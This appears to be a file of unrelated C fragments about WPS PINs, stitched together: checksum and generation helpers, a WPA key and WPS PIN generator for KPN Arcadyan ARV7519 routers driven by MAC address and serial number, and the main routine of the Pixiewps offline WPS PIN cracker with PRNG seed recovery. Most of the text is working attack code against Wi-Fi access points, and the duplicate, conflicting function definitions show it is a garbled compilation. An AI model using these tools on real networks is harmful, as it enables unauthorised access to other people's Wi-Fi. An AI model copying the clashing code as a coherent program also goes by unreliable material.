/** * wps_generate_pin - Generate a random PIN * Returns: Eight digit PIN (i.e., including the checksum digit) */ int wps_generate_pin(unsigned int *pin) { unsigned int val; /* Generate seven random digits for the PIN */ if (random_get_bytes((unsigned char *) &val, sizeof(val)) < 0) return -1; val %= 10000000; /* Append checksum digit */ *pin = val * 10 + wps_pin_checksum(val); return 0; }
/** * wps_generate_pin - Generate a random PIN * Returns: Eight digit PIN (i.e., including the checksum digit) */ unsigned int wps_generate_pin(void) { unsigned int val; /* Generate seven random digits for the PIN */ if (random_get_bytes((unsigned char *) &val, sizeof(val)) < 0) { struct os_time now; os_get_time(&now); val = os_random() ^ now.sec ^ now.usec; } val %= 10000000; /* Append checksum digit */ return val * 10 + wps_pin_checksum(val); }
void p2p_pincode(struct p2p *p, char *ins_no, char *ins_no_again) { int pin_check=0; p->p2p_get=0; ui_screen(p); printf("%s", ins_no); scanf("%d",&pin_check); while( wps_pin_checksum(pin_check) != 0 ) { ui_screen(p); printf("%s", ins_no_again); scanf("%d",&pin_check); } p->pin = pin_check; }
int is_valid_pin(char *pin) { if(!pin) return 0; int i; for (i = 0; i < strlen(pin); i++) { if(!isdigit(pin[i])) return 0; } if(strlen(pin) == 8) { char pin7[8] = { 0 }; char pin8[9] = { 0 }; memcpy((void *) &pin7, pin, sizeof(pin7)-1); snprintf(pin8, 9, "%s%d", pin7, wps_pin_checksum(atoi(pin7))); if (strcmp(pin, pin8) != 0) return 0; } return 1; }
/* Builds a WPS PIN from the key tables */ char *build_wps_pin() { char *key = NULL, *pin = NULL; int pin_len = PIN_SIZE + 1; pin = malloc(pin_len); key = malloc(pin_len); if(pin && key) { memset(key, 0, pin_len); memset(pin, 0, pin_len); /* Generate a 7-digit pin from the given key index values */ snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(get_p2_index())); /* Generate and append the pin checksum digit */ snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key))); free(key); } return pin; }
/** * wps_pin_valid - Check whether a PIN has a valid checksum * @pin: Eight digit PIN (i.e., including the checksum digit) * Returns: 1 if checksum digit is valid, or 0 if not */ unsigned int wps_pin_valid(unsigned int pin) { return wps_pin_checksum(pin / 10) == (pin % 10); }
int main (int argc, char *argv[]) { int opt = 0; int chs = 0; unsigned int mac_1, mac_2, mac_3, mac_4, mac_5, mac_6; unsigned int m7, m8, m9, m10, m11, m12; long ss, se; char *mac = "00:11:22:33:44:55"; char *s_start = "1"; char *s_end = "99999"; char *ke; int smac; char smacs[5]; unsigned int s6, s7, s8, s9, s10, k1, k2, x1, x2, x3, y1, y2, y3, z1, z2, z3; char *ptr; char *wpa = "000000000000"; char wpac[12],wpad; int go = 0; while ((opt = getopt(argc, argv, "m:v:s:e:?:")) != -1) { switch(opt) { case 'm': mac = optarg; chs = 0; go++; break; case 'v': chs = 1; break; case 's': s_start = optarg; s_end = s_start; break; case 'e': s_end = optarg; break; case '?': printf("\nparameters/usage:\n"); printf("\n-m [required]: MAC-address of router"); printf("\n-s [optional]: range start for last 5 digits of serial#. (Also use this to generate WPA key for just one unique serial#)"); printf("\n-e [optional]: range end for serial# (max. 99999)"); printf("\n-v [optional]: verbose - outputs serial# , WPA-key and WPS pin"); printf("\n\nexample 1: kpn_ARV7519WPA -m 74:31:70:BA:BA:A9\n"); printf("\nexample 2: kpn_ARV7519WPA -s 85894 -m 00:00:00:B8:68:21 -v 0\n\n"); break; } } if (go == 1) { printf("\nWPA/WPS Generator for KPN Arcadyan ARV7519 routers\n"); sscanf(mac, "%2X:%2X:%2X:%2X:%2X:%2X", &mac_1, &mac_2, &mac_3, &mac_4, &mac_5, &mac_6); printf("Generating WPA keys for SSID: ARV7519%2X%2X%2X [MAC : %s]\n", mac_4, mac_5, mac_6, mac ); printf("serial# range [last digits] from %s to %s \n\n" , s_start , s_end); ss = strtol(s_start, &ptr, 10); if (ss < 1) ss = 1; if (ss > 99998) ss = 99999; se = strtol(s_end, &ptr, 10); if (se < ss) se = ss; if (se > 99998) se = 99999; m7 = mac_4 >> 4 & 0x0f; m8 = mac_4 & 0x0f; m9 = mac_5 >> 4 & 0x0f; m10 = mac_5 & 0x0f; m11 = mac_6 >> 4 & 0x0f; m12 = mac_6 & 0x0f; for ( smac = ss ; smac <= se ; smac++){ sprintf(smacs, "%05d", smac); s6 = smacs[0] - '0'; s7 = smacs[1] - '0'; s8 = smacs[2] - '0'; s9 = smacs[3] - '0'; s10 = smacs[4] - '0'; k1 = (s7 + s8 + m11 + m12) & 0x0f; k2 = (m9 + m10 +s9 + s10) & 0x0f; x1 = k1 ^ s10; x2 = k1 ^ s9; x3 = k1 ^ s8; y1 = k2 ^ m10; y2 = k2 ^ m11; y3 = k2 ^ m12; z1 = m11 ^ s10; z2 = m12 ^ s9; z3 = k1 ^ k2; if (chs == 0) printf("%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X\n", x1,y1,z1,s6,x2,y2,z2,k2,x3,y3,z3,k1); if (chs == 1) { int pin; char pinhex[7]; sprintf(pinhex, "%1X%1X%1X%1X%1X%1X%1X", x1,x2,y1,y2,z1,z2,x3); sscanf(pinhex, "%x", &pin); pin = pin % 10000000; printf("Serial# J....%5d - WPA key: %1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X - WPS pin: %07d%d\n", smac, x1,y1,z1,s6,x2,y2,z2,k2,x3,y3,z3,k1,pin, wps_pin_checksum(pin)); } } }
int main(int argc, char **argv) { struct global *wps; if ((wps = calloc(1, sizeof(struct global)))) { wps->pke = 0; wps->pkr = 0; wps->e_hash1 = 0; wps->e_hash2 = 0; wps->authkey = 0; wps->e_nonce = 0; wps->r_nonce = 0; wps->e_bssid = 0; wps->psk1 = 0; wps->psk2 = 0; wps->dhkey = 0; wps->kdk = 0; wps->wrapkey = 0; wps->emsk = 0; wps->e_s1 = 0; wps->e_s2 = 0; wps->bruteforce = false; wps->verbosity = 2; wps->error = calloc(256, 1); if (!wps->error) goto memory_err; wps->error[0] = '\n'; } else { memory_err: fprintf(stderr, "\n [X] Memory allocation error!\n"); return MEM_ERROR; } int opt = 0; int long_index = 0; opt = getopt_long(argc, argv, option_string, long_options, &long_index); while (opt != -1) { switch (opt) { case 'e': wps->pke = malloc(WPS_PUBKEY_LEN); if (!wps->pke) goto memory_err; if (hex_string_to_byte_array(optarg, wps->pke, WPS_PUBKEY_LEN)) { snprintf(wps->error, 256, "\n [!] Bad enrollee public key -- %s\n\n", optarg); goto usage_err; } break; case 'r': wps->pkr = malloc(WPS_PUBKEY_LEN); if (!wps->pkr) goto memory_err; if (hex_string_to_byte_array(optarg, wps->pkr, WPS_PUBKEY_LEN)) { snprintf(wps->error, 256, "\n [!] Bad registrar public key -- %s\n\n", optarg); goto usage_err; } break; case 's': wps->e_hash1 = malloc(WPS_HASH_LEN); if (!wps->e_hash1) goto memory_err; if (hex_string_to_byte_array(optarg, wps->e_hash1, WPS_HASH_LEN)) { snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg); goto usage_err; } break; case 'z': wps->e_hash2 = malloc(WPS_HASH_LEN); if (!wps->e_hash2) goto memory_err; if (hex_string_to_byte_array(optarg, wps->e_hash2, WPS_HASH_LEN)) { snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg); goto usage_err; } break; case 'a': wps->authkey = malloc(WPS_AUTHKEY_LEN); if (!wps->authkey) goto memory_err; if (hex_string_to_byte_array(optarg, wps->authkey, WPS_HASH_LEN)) { snprintf(wps->error, 256, "\n [!] Bad authentication session key -- %s\n\n", optarg); goto usage_err; } break; case 'n': wps->e_nonce = malloc(WPS_NONCE_LEN); if (!wps->e_nonce) goto memory_err; if (hex_string_to_byte_array(optarg, wps->e_nonce, WPS_NONCE_LEN)) { snprintf(wps->error, 256, "\n [!] Bad enrollee nonce -- %s\n\n", optarg); goto usage_err; } break; case 'm': wps->r_nonce = malloc(WPS_NONCE_LEN); if (!wps->r_nonce) goto memory_err; if (hex_string_to_byte_array(optarg, wps->r_nonce, WPS_NONCE_LEN)) { snprintf(wps->error, 256, "\n [!] Bad registrar nonce -- %s\n\n", optarg); goto usage_err; } break; case 'b': wps->e_bssid = malloc(WPS_BSSID_LEN); if (!wps->e_bssid) goto memory_err; if (hex_string_to_byte_array(optarg, wps->e_bssid, WPS_BSSID_LEN)) { snprintf(wps->error, 256, "\n [!] Bad enrollee MAC address -- %s\n\n", optarg); goto usage_err; } break; case 'S': wps->small_dh_keys = true; break; case 'f': wps->bruteforce = true; break; case 'v': if (get_int(optarg, &wps->verbosity) != 0 || wps->verbosity < 1 || 3 < wps->verbosity) { snprintf(wps->error, 256, "\n [!] Bad verbosity level -- %s\n\n", optarg); goto usage_err; }; break; case 'h': goto usage_err; case '?': default: fprintf(stderr, "%s -h for help\n", argv[0]); return ARG_ERROR; } opt = getopt_long(argc, argv, option_string, long_options, &long_index); } /* Not all required arguments have been supplied */ if (wps->pke == 0 || wps->e_hash1 == 0 || wps->e_hash2 == 0) { wps->error = "\n [!] Not all required arguments have been supplied!\n\n"; usage_err: fprintf(stderr, usage, VERSION, argv[0], wps->error); return ARG_ERROR; } /* If --dh-small is selected then no --pkr should be supplied */ if (wps->pkr && wps->small_dh_keys) { wps->error = "\n [!] Options --dh-small and --pkr are mutually exclusive!\n\n"; goto usage_err; } /* Either --pkr or --dh-small must be specified */ if (!wps->pkr && !wps->small_dh_keys) { wps->error = "\n [!] Either --pkr or --dh-small must be specified!\n\n"; goto usage_err; } if (wps->small_dh_keys) { /* Small DH keys selected */ wps->pkr = malloc(WPS_PUBKEY_LEN); if (!wps->pkr) goto memory_err; /* g^A mod p = 2 (g = 2, A = 1, p > 2) */ memset(wps->pkr, 0, WPS_PUBKEY_LEN - 1); wps->pkr[WPS_PUBKEY_LEN - 1] = 0x02; if (!wps->authkey) { if (wps->e_nonce) { if (wps->r_nonce) { if (wps->e_bssid) { /* Computing AuthKey */ wps->dhkey = malloc(WPS_HASH_LEN); if (!wps->dhkey) goto memory_err; wps->kdk = malloc(WPS_HASH_LEN); if (!wps->kdk) goto memory_err; unsigned char *buffer = malloc(WPS_NONCE_LEN * 2 + WPS_BSSID_LEN); if (!buffer) goto memory_err; /* DHKey = SHA-256(g^(AB) mod p) = SHA-256(PKe^A mod p) = SHA-256(PKe) (g = 2, A = 1, p > 2) */ sha256(wps->pke, WPS_PUBKEY_LEN, wps->dhkey); memcpy(buffer, wps->e_nonce, WPS_NONCE_LEN); memcpy(buffer + WPS_NONCE_LEN, wps->e_bssid, WPS_BSSID_LEN); memcpy(buffer + WPS_NONCE_LEN + WPS_BSSID_LEN, wps->r_nonce, WPS_NONCE_LEN); /* KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce) */ hmac_sha256(wps->dhkey, WPS_HASH_LEN, buffer, WPS_NONCE_LEN * 2 + WPS_BSSID_LEN, wps->kdk); buffer = realloc(buffer, WPS_HASH_LEN * 3); if (!buffer) goto memory_err; /* Key derivation function */ kdf(wps->kdk, WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN + WPS_EMSK_LEN, buffer); wps->authkey = malloc(WPS_AUTHKEY_LEN); if (!wps->authkey) goto memory_err; memcpy(wps->authkey, buffer, WPS_AUTHKEY_LEN); if (wps->verbosity > 2) { wps->wrapkey = malloc(WPS_KEYWRAPKEY_LEN); if (!wps->wrapkey) goto memory_err; wps->emsk = malloc(WPS_EMSK_LEN); if (!wps->emsk) goto memory_err; memcpy(wps->wrapkey, buffer + WPS_AUTHKEY_LEN, WPS_KEYWRAPKEY_LEN); memcpy(wps->emsk, buffer + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN, WPS_EMSK_LEN); } if (wps->verbosity < 3) { free(wps->dhkey); free(wps->kdk); } free(buffer); } else { wps->error = "\n [!] Neither --authkey and --e-bssid have been supplied!\n\n"; goto usage_err; } } else { wps->error = "\n [!] Neither --authkey and --r-nonce have been supplied!\n\n"; goto usage_err; } } else { wps->error = "\n [!] Neither --authkey and --e-nonce have been supplied!\n\n"; goto usage_err; } } } /* E-S1 = E-S2 = 0 */ wps->e_s1 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s1) goto memory_err; wps->e_s2 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s2) goto memory_err; /* Allocating memory for digests */ wps->psk1 = malloc(WPS_HASH_LEN); if (!wps->psk1) goto memory_err; wps->psk2 = malloc(WPS_HASH_LEN); if (!wps->psk2) goto memory_err; unsigned char *result = (unsigned char *) malloc(WPS_HASH_LEN); if (!result) goto memory_err; unsigned char *buffer = (unsigned char *) malloc(WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2); if (!buffer) goto memory_err; uint32_t seed; uint32_t print_seed; /* Seed to display at the end */ unsigned int first_half; unsigned int second_half; unsigned char s_pin[4] = {0}; bool valid = false; int mode = 1; bool found = false; struct timeval t0, t1; gettimeofday(&t0, 0); while (mode <= MAX_MODE && !found) { seed = 0; print_seed = 0; /* ES-1 = ES-2 = E-Nonce */ if (mode == 2 && wps->e_nonce) { memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN); memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN); } /* PRNG bruteforce (rand_r) */ if (mode == 3 && wps->e_nonce) { /* Reducing entropy from 32 to 25 bits */ uint32_t index = wps->e_nonce[0] << 25; uint32_t limit = index | 0x01ffffff; while (1) { seed = index; int i; for (i = 1; i < WPS_NONCE_LEN; i++) { if (wps->e_nonce[i] != (unsigned char) rand_r(&seed)) break; } if (i == WPS_NONCE_LEN) { /* Seed found */ print_seed = seed; /* Advance to get ES-1 */ for (i = 0; i < WPS_SECRET_NONCE_LEN; i++) wps->e_s1[i] = (unsigned char) rand_r(&seed); /* Advance to get ES-2 */ for (i = 0; i < WPS_SECRET_NONCE_LEN; i++) wps->e_s2[i] = (unsigned char) rand_r(&seed); break; } if (index == limit) break; /* Complete bruteforce exausted */ index++; } } /* PRNG bruteforce (random_r) */ if (mode == 4 && wps->e_nonce) { /* Checks if the sequence may actually be generated by current random function */ if (wps->e_nonce[0] < 0x80 && wps->e_nonce[4] < 0x80 && wps->e_nonce[8] < 0x80 && wps->e_nonce[12] < 0x80) { valid = true; /* Converting enrollee nonce to the sequence may be generated by current random function */ uint32_t randr_enonce[4] = {0}; int j = 0; for (int i = 0; i < 4; i++) { randr_enonce[i] |= wps->e_nonce[j++]; randr_enonce[i] <<= 8; randr_enonce[i] |= wps->e_nonce[j++]; randr_enonce[i] <<= 8; randr_enonce[i] |= wps->e_nonce[j++]; randr_enonce[i] <<= 8; randr_enonce[i] |= wps->e_nonce[j++]; } uint32_t limit; struct timeval curr_time; gettimeofday(&curr_time, 0); if (wps->bruteforce) { seed = curr_time.tv_sec + SEC_PER_DAY * MODE4_DAYS - SEC_PER_HOUR * 2; limit = 0; } else { seed = curr_time.tv_sec + SEC_PER_HOUR * 2; limit = curr_time.tv_sec - SEC_PER_DAY * MODE4_DAYS - SEC_PER_HOUR * 2; } struct random_data *buf = (struct random_data *) calloc(1, sizeof(struct random_data)); char *rand_statebuf = (char *) calloc(1, 128); initstate_r(seed, rand_statebuf, 128, buf); int32_t res = 0; while (1) { srandom_r(seed, buf); int i; for (i = 0; i < 4; i++) { random_r(buf, &res); if (res != randr_enonce[i]) break; } if (i == 4) { print_seed = seed; srandom_r(print_seed + 1, buf); for (int i = 0; i < 4; i++) { random_r(buf, &res); uint32_t be = __be32_to_cpu(res); memcpy(&(wps->e_s1[4 * i]), &be, 4); memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* ES-1 = ES-2 != E-Nonce */ } } if (print_seed || seed == limit) { free(buf); free(rand_statebuf); break; } seed--; } } } /* WPS pin cracking */ if (mode == 1 || (mode == 2 && wps->e_nonce) || (mode == 3 && print_seed) || (mode == 4 && print_seed)) { crack: first_half = 0; second_half = 0; while (first_half < 10000) { uint_to_char_array(first_half, 4, s_pin); hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk1); memcpy(buffer, wps->e_s1, WPS_SECRET_NONCE_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk1, WPS_PSK_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN); hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result); if (memcmp(result, wps->e_hash1, WPS_HASH_LEN)) { first_half++; } else { break; } } if (first_half < 10000) { /* First half found */ unsigned char checksum_digit; unsigned int c_second_half; /* Testing with checksum digit */ while (second_half < 1000) { checksum_digit = wps_pin_checksum(first_half * 1000 + second_half); c_second_half = second_half * 10 + checksum_digit; uint_to_char_array(c_second_half, 4, s_pin); hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk2); memcpy(buffer, wps->e_s2, WPS_SECRET_NONCE_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk2, WPS_PSK_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN); hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result); if (memcmp(result, wps->e_hash2, WPS_HASH_LEN)) { second_half++; } else { second_half = c_second_half; found = true; break; } } /* Testing without checksum digit */ if (!found) { second_half = 0; while (second_half < 10000) { /* If already tested skip */ if (wps_pin_valid(first_half * 10000 + second_half)) { second_half++; continue; } uint_to_char_array(second_half, 4, s_pin); hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk2); memcpy(buffer, wps->e_s2, WPS_SECRET_NONCE_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk2, WPS_PSK_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN); memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN); hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result); if (memcmp(result, wps->e_hash2, WPS_HASH_LEN)) { second_half++; } else { found = true; break; } } } } } /* E-S1 = E-Nonce != E-S2 */ if (mode == 4 && print_seed && !found) { memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN); mode++; goto crack; } mode++; } gettimeofday(&t1, 0); long elapsed_s = t1.tv_sec - t0.tv_sec; mode--; printf("\n Pixiewps %s\n", VERSION); if (found) { if (wps->e_nonce) { if ((mode == 3 || mode == 4) && wps->verbosity > 2) { printf("\n [*] PRNG Seed: %u", print_seed); } if (mode == 4 && wps->verbosity > 2) { time_t seed_time; struct tm ts; char buffer[30]; seed_time = print_seed; ts = *localtime(&seed_time); strftime(buffer, 30, "%c", &ts); printf(" (%s)", buffer); } } if (wps->verbosity > 2) { if (wps->dhkey) { /* To see if AuthKey was supplied or not */ printf("\n [*] DHKey: "); byte_array_print(wps->dhkey, WPS_HASH_LEN); printf("\n [*] KDK: "); byte_array_print(wps->kdk, WPS_HASH_LEN); printf("\n [*] AuthKey: "); byte_array_print(wps->authkey, WPS_AUTHKEY_LEN); printf("\n [*] EMSK: "); byte_array_print(wps->emsk, WPS_EMSK_LEN); printf("\n [*] KeyWrapKey: "); byte_array_print(wps->wrapkey, WPS_KEYWRAPKEY_LEN); } printf("\n [*] PSK1: "); byte_array_print(wps->psk1, WPS_PSK_LEN); printf("\n [*] PSK2: "); byte_array_print(wps->psk2, WPS_PSK_LEN); } if (wps->verbosity > 1) { printf("\n [*] E-S1: "); byte_array_print(wps->e_s1, WPS_SECRET_NONCE_LEN); printf("\n [*] E-S2: "); byte_array_print(wps->e_s2, WPS_SECRET_NONCE_LEN); } printf("\n [+] WPS pin: %04u%04u", first_half, second_half); } else { printf("\n [-] WPS pin not found!"); } printf("\n\n [*] Time taken: %lu s\n\n", elapsed_s); if (!found && mode == 4 && valid && !wps->bruteforce) { printf(" [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.\n\n"); } free(result); free(buffer); free(wps->pke); free(wps->pkr); free(wps->e_hash1); free(wps->e_hash2); free(wps->authkey); free(wps->e_nonce); free(wps->r_nonce); free(wps->e_bssid); free(wps->psk1); free(wps->psk2); free(wps->e_s1); free(wps->e_s2); free(wps->error); if (wps->verbosity > 2) { free(wps->dhkey); free(wps->kdk); free(wps->wrapkey); free(wps->emsk); } free(wps); return (!found); /* 0 success, 1 failure */ }